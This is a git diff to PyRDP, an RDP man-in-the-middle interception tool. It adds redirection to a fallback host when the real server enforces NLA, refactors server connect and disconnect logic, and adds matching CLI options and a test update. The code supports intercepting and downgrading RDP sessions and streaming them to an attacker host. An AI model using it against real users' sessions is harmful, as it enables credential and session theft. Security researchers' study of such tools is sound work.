diff --git a/pyrdp/mitm/RDPMITM.py b/pyrdp/mitm/RDPMITM.py index 6e7058a96..3a4717333 100644 --- a/pyrdp/mitm/RDPMITM.py +++ b/pyrdp/mitm/RDPMITM.py @@ -49,9 +49,9 @@ class RDPMITM: Main MITM class. The job of this class is to orchestrate the components for all the protocols. """ - def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, config: MITMConfig, state: RDPMITMState=None, recorder: Recorder=None): + def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, config: MITMConfig, state: RDPMITMState = None, recorder: Recorder = None): """ - :param log: base logger to use for the connection + :param mainLogger: base logger to use for the connection :param config: the MITM configuration """ @@ -94,11 +94,13 @@ def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, conf self.channelMITMs = {} """MITM components for virtual channels""" - serverConnector = self.connectToServer() - self.tcp = TCPMITM(self.client.tcp, self.server.tcp, self.player.tcp, self.getLog("tcp"), self.state, self.recorder, serverConnector, self.statCounter) + self.onTlsReady = None + """Callback for when TLS is done""" + + self.tcp = TCPMITM(self.client.tcp, self.server.tcp, self.player.tcp, self.getLog("tcp"), self.state, self.recorder, self.statCounter) """TCP MITM component""" - self.x224 = X224MITM(self.client.x224, self.server.x224, self.getLog("x224"), self.state, serverConnector, self.startTLS) + self.x224 = X224MITM(self.client.x224, self.server.x224, self.getLog("x224"), self.state, self.connectToServer, self.disconnectFromServer, self.startTLS) """X224 MITM component""" self.mcs = MCSMITM(self.client.mcs, self.server.mcs, self.state, self.recorder, self.buildChannel, self.getLog("mcs"), self.statCounter) @@ -140,15 +142,17 @@ def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, conf if config.recordReplays: date = datetime.datetime.now() - replayFileName = "rdp_replay_{}_{}_{}.pyrdp"\ - .format(date.strftime('%Y%m%d_%H-%M-%S'), - date.microsecond // 1000, - self.state.sessionID) + replayFileName = f"rdp_replay_{date.strftime('%Y%m%d_%H-%M-%S')}_{date.microsecond // 1000}_{self.state.sessionID}.pyrdp" self.recorder.setRecordFilename(replayFileName) self.recorder.addTransport(FileLayer(self.config.replayDir / replayFileName)) if config.enableCrawler: - self.crawler: FileCrawlerMITM = FileCrawlerMITM(self.getClientLog(MCSChannelName.DEVICE_REDIRECTION).createChild("crawler"), crawlerLogger, self.config, self.state) + self.crawler: FileCrawlerMITM = FileCrawlerMITM( + self.getClientLog(MCSChannelName.DEVICE_REDIRECTION).createChild("crawler"), + crawlerLogger, + self.config, + self.state + ) def getProtocol(self) -> Protocol: """ @@ -177,6 +181,10 @@ def getServerLog(self, name: str) -> SessionLogger: """ return self.serverLog.createChild(name) + def disconnectFromServer(self): + self.server.replaceTCP() + self.tcp.setServer(self.server.tcp) + async def connectToServer(self): """ Coroutine that connects to the target RDP server and the attacker. @@ -185,20 +193,20 @@ async def connectToServer(self): serverFactory = AwaitableClientFactory(self.server.tcp) if self.config.transparent: - src = self.client.tcp.transport.client - if self.config.targetHost: - # Fully Transparent (with a specific poisoned target.) - connectTransparent(self.config.targetHost, self.config.targetPort, serverFactory, bindAddress=(src[0], 0)) + if self.state.effectiveTargetHost: + # Fully Transparent (with a specific poisoned target, or when using redirection) + src = self.client.tcp.transport.client + connectTransparent(self.state.effectiveTargetHost, self.state.effectiveTargetPort, serverFactory, bindAddress=(src[0], 0)) else: # Half Transparent (for client-side only) dst = self.client.tcp.transport.getHost().host - reactor.connectTCP(dst, self.config.targetPort, serverFactory) + reactor.connectTCP(dst, self.state.effectiveTargetPort, serverFactory) else: - reactor.connectTCP(self.config.targetHost, self.config.targetPort, serverFactory) + reactor.connectTCP(self.state.effectiveTargetHost, self.state.effectiveTargetPort, serverFactory) await serverFactory.connected.wait() - if self.config.attackerHost is not None and self.config.attackerPort is not None: + if self.config.attackerHost is not None and self.config.attackerPort is not None and not self.player.tcp.connectedEvent.is_set(): attackerFactory = AwaitableClientFactory(self.player.tcp) reactor.connectTCP(self.config.attackerHost, self.config.attackerPort, attackerFactory) diff --git a/pyrdp/mitm/TCPMITM.py b/pyrdp/mitm/TCPMITM.py index f6e9ffe2c..3f382a30e 100644 --- a/pyrdp/mitm/TCPMITM.py +++ b/pyrdp/mitm/TCPMITM.py @@ -1,11 +1,9 @@ # # This file is part of the PyRDP project. -# Copyright (C) 2019 GoSecure Inc. +# Copyright (C) 2019-2021 GoSecure Inc. # Licensed under the GPLv3 or later. # -import time from logging import LoggerAdapter -from typing import Coroutine from pyrdp.layer import TwistedTCPLayer from pyrdp.logging.StatCounter import StatCounter @@ -20,46 +18,52 @@ class TCPMITM: """ def __init__(self, client: TwistedTCPLayer, server: TwistedTCPLayer, attacker: TwistedTCPLayer, log: LoggerAdapter, - state: RDPMITMState, recorder: Recorder, serverConnector: Coroutine, statCounter: StatCounter): + state: RDPMITMState, recorder: Recorder, statCounter: StatCounter): """ :param client: TCP layer for the client side :param server: TCP layer for the server side :param attacker: TCP layer for the attacker side :param log: logger for this component :param recorder: recorder for this connection - :param serverConnector: coroutine that connects to the server side, closed when the client disconnects """ self.statCounter = statCounter # To keep track of useful statistics for the connection. - self.client = client - self.server = server + self.server = None self.attacker = attacker self.log = log self.state = state self.recorder = recorder - self.serverConnector = serverConnector # Allows a lower layer to raise error tagged with the correct sessionID self.client.log = log - self.server.log = log self.clientObserver = self.client.createObserver( onConnection = self.onClientConnection, onDisconnection = self.onClientDisconnection, ) - self.serverObserver = self.server.createObserver( - onConnection = self.onServerConnection, - onDisconnection = self.onServerDisconnection, - ) - self.attacker.createObserver( onConnection = self.onAttackerConnection, onDisconnection = self.onAttackerDisconnection, ) + self.serverObserver = None + self.setServer(server) + + def setServer(self, server: TwistedTCPLayer): + if self.server is not None: + self.server.removeObserver(self.serverObserver) + self.server.disconnect(True) + + self.server = server + self.server.log = self.log + self.serverObserver = self.server.createObserver( + onConnection=self.onServerConnection, + onDisconnection=self.onServerDisconnection, + ) + def detach(self): """ Remove the observers from the layers. @@ -75,7 +79,6 @@ def onClientConnection(self): # Statistics self.statCounter.start() - self.connectionTime = time.time() ip = self.client.transport.client[0] self.log.info("New client connected from %(clientIp)s", {"clientIp": ip}) @@ -94,7 +97,7 @@ def onClientDisconnection(self, reason): self.recorder.recordFilename}) else: self.statCounter.logReport(self.log) - self.serverConnector.close() + self.server.disconnect(True) # For the attacker, we want to make sure we don't abort the connection to make sure that the close event is sent @@ -137,4 +140,4 @@ def onAttackerDisconnection(self, reason): def recordConnectionClose(self): pdu = PlayerConnectionClosePDU(self.recorder.getCurrentTimeStamp()) - self.recorder.record(pdu, pdu.header) \ No newline at end of file + self.recorder.record(pdu, pdu.header) diff --git a/pyrdp/mitm/X224MITM.py b/pyrdp/mitm/X224MITM.py index 5ce6f36b9..64c7be4dd 100644 --- a/pyrdp/mitm/X224MITM.py +++ b/pyrdp/mitm/X224MITM.py @@ -4,11 +4,11 @@ # Licensed under the GPLv3 or later. # -import typing +from typing import Callable, Coroutine, Optional from logging import LoggerAdapter from pyrdp.core import defer -from pyrdp.enum import NegotiationFailureCode, NegotiationProtocols, NegotiationType, NegotiationRequestFlags +from pyrdp.enum import NegotiationFailureCode, NegotiationType, NegotiationRequestFlags from pyrdp.layer import X224Layer from pyrdp.mitm.state import RDPMITMState from pyrdp.parser import NegotiationRequestParser, NegotiationResponseParser @@ -17,14 +17,17 @@ class X224MITM: - def __init__(self, client: X224Layer, server: X224Layer, log: LoggerAdapter, state: RDPMITMState, connector: typing.Coroutine, startTLSCallback: typing.Callable[[typing.Callable[[], None]], None]): + def __init__(self, client: X224Layer, server: X224Layer, log: LoggerAdapter, state: RDPMITMState, + connector: Callable[[], Coroutine], disconnector: Callable[[], None], + startTLSCallback: Callable[[Callable[[], None]], None]): """ :param client: X224 layer for the client side :param server: X224 layer for the server side :param log: logger for this component :param state: state of the MITM - :param connector: coroutine that connects to the server, awaited when a connection request is received + :param connector: function that connects to the server, called when a connection request is received + :param disconnector: function that disconnects from the server, called when using a redirection host and NLA is enforced :param startTLSCallback: callback that should execute a startTLS on the client and server sides """ @@ -34,8 +37,10 @@ def __init__(self, client: X224Layer, server: X224Layer, log: LoggerAdapter, sta self.log = log self.state = state self.connector = connector + self.disconnector = disconnector self.startTLSCallback = startTLSCallback - self.originalRequest: typing.Optional[NegotiationRequestPDU] = None + self.originalConnectionRequest: Optional[X224ConnectionRequestPDU] = None + self.originalNegotiationRequest: Optional[NegotiationRequestPDU] = None self.client.createObserver( onConnectionRequest = self.onConnectionRequest, @@ -56,30 +61,31 @@ def onConnectionRequest(self, pdu: X224ConnectionRequestPDU): """ parser = NegotiationRequestParser() - self.originalRequest = parser.parse(pdu.payload) - self.state.requestedProtocols = self.originalRequest.requestedProtocols + self.originalConnectionRequest = pdu + self.originalNegotiationRequest = parser.parse(pdu.payload) + self.state.requestedProtocols = self.originalNegotiationRequest.requestedProtocols - if self.originalRequest.flags is not None and self.originalRequest.flags & NegotiationRequestFlags.RESTRICTED_ADMIN_MODE_REQUIRED: + if self.originalNegotiationRequest.flags is not None and self.originalNegotiationRequest.flags & NegotiationRequestFlags.RESTRICTED_ADMIN_MODE_REQUIRED: self.log.warning("Client has enabled Restricted Admin Mode, which forces Network-Level Authentication (NLA)." " Connection will fail.", {"restrictedAdminActivated": True}) - if self.originalRequest.cookie: - self.log.info("%(cookie)s", {"cookie": self.originalRequest.cookie.decode()}) + if self.originalNegotiationRequest.cookie: + self.log.info("%(cookie)s", {"cookie": self.originalNegotiationRequest.cookie.decode()}) else: self.log.info("No cookie for this connection") - chosenProtocols = self.originalRequest.requestedProtocols + chosenProtocols = self.originalNegotiationRequest.requestedProtocols if chosenProtocols is not None: # Tell the server we only support the allowed authentication methods. chosenProtocols &= self.state.config.authMethods modifiedRequest = NegotiationRequestPDU( - self.originalRequest.cookie, - self.originalRequest.flags, + self.originalNegotiationRequest.cookie, + self.originalNegotiationRequest.flags, chosenProtocols, - self.originalRequest.correlationFlags, - self.originalRequest.correlationID, + self.originalNegotiationRequest.correlationFlags, + self.originalNegotiationRequest.correlationID, ) payload = parser.write(modifiedRequest) @@ -90,13 +96,13 @@ async def connectToServer(self, payload: bytes): Awaits the coroutine that connects to the server. :param payload: the connection request payload """ - await self.connector + await self.connector() self.server.sendConnectionRequest(payload = payload) def onConnectionConfirm(self, pdu: X224ConnectionConfirmPDU): """ Execute a startTLS if the SSL protocol was selected. - :param _: the connection confirm PDU + :param pdu: the connection confirm PDU """ # FIXME: In case the server picks anything other than what we support, PyRDP is @@ -108,14 +114,28 @@ def onConnectionConfirm(self, pdu: X224ConnectionConfirmPDU): parser = NegotiationResponseParser() response = parser.parse(pdu.payload) if isinstance(response, NegotiationFailurePDU): - self.log.info("The server failed the negotiation. Error: %(error)s", {"error": NegotiationFailureCode.getMessage(response.failureCode)}) - payload = pdu.payload + if response.failureCode == NegotiationFailureCode.HYBRID_REQUIRED_BY_SERVER and self.state.canRedirect(): + self.log.info("The server forces the use of NLA. Using redirection host: %(redirectionHost)s:%(redirectionPort)d", { + "redirectionHost": self.state.config.redirectionHost, + "redirectionPort": self.state.config.redirectionPort + }) + + # Disconnect from current server + self.disconnector() + + # Use redirection host and replay sequence starting from the connection request + self.state.useRedirectionHost() + self.onConnectionRequest(self.originalConnectionRequest) + return + else: + self.log.info("The server failed the negotiation. Error: %(error)s", {"error": NegotiationFailureCode.getMessage(response.failureCode)}) + payload = pdu.payload else: payload = parser.write(NegotiationResponsePDU(NegotiationType.TYPE_RDP_NEG_RSP, 0x00, response.selectedProtocols)) # FIXME: This should be done based on what authentication method the server selected, not on what # the client supports. - if self.originalRequest.tlsSupported: + if self.originalNegotiationRequest.tlsSupported: # If a TLS tunnel is requested, then we establish the server-side tunnel before # replying to the client, so that we can clone the certificate if needed. self.startTLSCallback(lambda: self.client.sendConnectionConfirm(payload, source=0x1234)) @@ -133,4 +153,4 @@ def onClientError(self, pdu: X224ErrorPDU): self.server.sendPDU(pdu) def onServerError(self, pdu: X224ErrorPDU): - self.client.sendPDU(pdu) \ No newline at end of file + self.client.sendPDU(pdu) diff --git a/pyrdp/mitm/cli.py b/pyrdp/mitm/cli.py index 673bed81e..1aa1415b6 100644 --- a/pyrdp/mitm/cli.py +++ b/pyrdp/mitm/cli.py @@ -127,6 +127,8 @@ def buildArgParser(): "--transparent", help="Spoof source IP for connections to the server (See README)", action="store_true") parser.add_argument("--no-gdi", help="Disable accelerated graphics pipeline (MS-RDPEGDI) extension", action="store_true") + parser.add_argument("--nla-redirection-host", help="Redirection target ip if NLA is enforced", default=None) + parser.add_argument("--nla-redirection-port", help="Redirection target port if NLA is enforced", type=int, default=None) return parser @@ -163,6 +165,10 @@ def configure(cmdline=None) -> MITMConfig: sys.stderr.write('error: A relay target is required unless running in transparent proxy mode.\n') sys.exit(1) + if (args.nla_redirection_host is None) != (args.nla_redirection_port is None): + sys.stderr.write('Error: please provide both --nla-redirection-host and --nla-redirection-port') + sys.exit(1) + if args.target: targetHost, targetPort = parseTarget(args.target) else: @@ -191,6 +197,8 @@ def configure(cmdline=None) -> MITMConfig: config.extractFiles = not args.no_files config.disableActiveClipboardStealing = args.disable_active_clipboard config.useGdi = not args.no_gdi + config.redirectionHost = args.nla_redirection_host + config.redirectionPort = args.nla_redirection_port payload = None powershell = None diff --git a/pyrdp/mitm/config.py b/pyrdp/mitm/config.py index f0591b9fd..f0946a852 100644 --- a/pyrdp/mitm/config.py +++ b/pyrdp/mitm/config.py @@ -82,6 +82,12 @@ def __init__(self): self.authMethods: NegotiationProtocols = NegotiationProtocols.SSL """Specifies the list of authentication protocols that PyRDP accepts.""" + self.redirectionHost = None + """Host to redirect the connection to if NLA is enforced""" + + self.redirectionPort = None + """Port of the redirection host""" + @property def replayDir(self) -> Path: """ diff --git a/pyrdp/mitm/layerset.py b/pyrdp/mitm/layerset.py index e4ba7640a..6cd685b8d 100644 --- a/pyrdp/mitm/layerset.py +++ b/pyrdp/mitm/layerset.py @@ -1,6 +1,6 @@ # # This file is part of the PyRDP project. -# Copyright (C) 2019 GoSecure Inc. +# Copyright (C) 2019-2021 GoSecure Inc. # Licensed under the GPLv3 or later. # @@ -27,3 +27,8 @@ def __init__(self): self.tcp.setNext(self.segmentation) self.segmentation.attachLayer(SegmentationPDUType.TPKT, self.tpkt) LayerChainItem.chain(self.tpkt, self.x224, self.mcs) + + def replaceTCP(self): + self.tcp = TwistedTCPLayer() + self.tcp.setNext(self.segmentation) + self.segmentation.attachLayer(SegmentationPDUType.TPKT, self.tpkt) diff --git a/pyrdp/mitm/state.py b/pyrdp/mitm/state.py index d914a0f24..9c40d09d9 100644 --- a/pyrdp/mitm/state.py +++ b/pyrdp/mitm/state.py @@ -78,6 +78,12 @@ def __init__(self, config: MITMConfig, sessionID: str): self.windowSize = None + self.effectiveTargetHost = self.config.targetHost + """The host that is currently used as a connection target. It becomes the redirection host when redirection is necessary.""" + + self.effectiveTargetPort = self.config.targetPort + """Port for the effective host""" + self.securitySettings.addObserver(self.crypters[ParserMode.CLIENT]) self.securitySettings.addObserver(self.crypters[ParserMode.SERVER]) @@ -104,3 +110,13 @@ def createFastPathLayer(self, mode: ParserMode) -> FastPathLayer: parser = createFastPathParser(self.useTLS, self.securitySettings.encryptionMethod, self.crypters[mode], mode) return FastPathLayer(parser) + + def canRedirect(self) -> bool: + return None not in [self.config.redirectionHost, self.config.redirectionPort] and not self.isRedirected() + + def isRedirected(self) -> bool: + return self.effectiveTargetHost == self.config.redirectionHost + + def useRedirectionHost(self): + self.effectiveTargetHost = self.config.redirectionHost + self.effectiveTargetPort = self.config.redirectionPort diff --git a/test/test_X224MITM.py b/test/test_X224MITM.py index d6911c965..15e0e670f 100644 --- a/test/test_X224MITM.py +++ b/test/test_X224MITM.py @@ -13,7 +13,7 @@ class FileMappingTest(unittest.TestCase): def setUp(self): - self.mitm = X224MITM(Mock(), Mock(), Mock(), Mock(), Mock(), MagicMock()) + self.mitm = X224MITM(Mock(), Mock(), Mock(), Mock(), MagicMock(), MagicMock(), MagicMock()) def test_negotiationFlagsNone_doesntRaise(self): connectionRequest = X224ConnectionRequestPDU(0, 0, 0, 0, b"")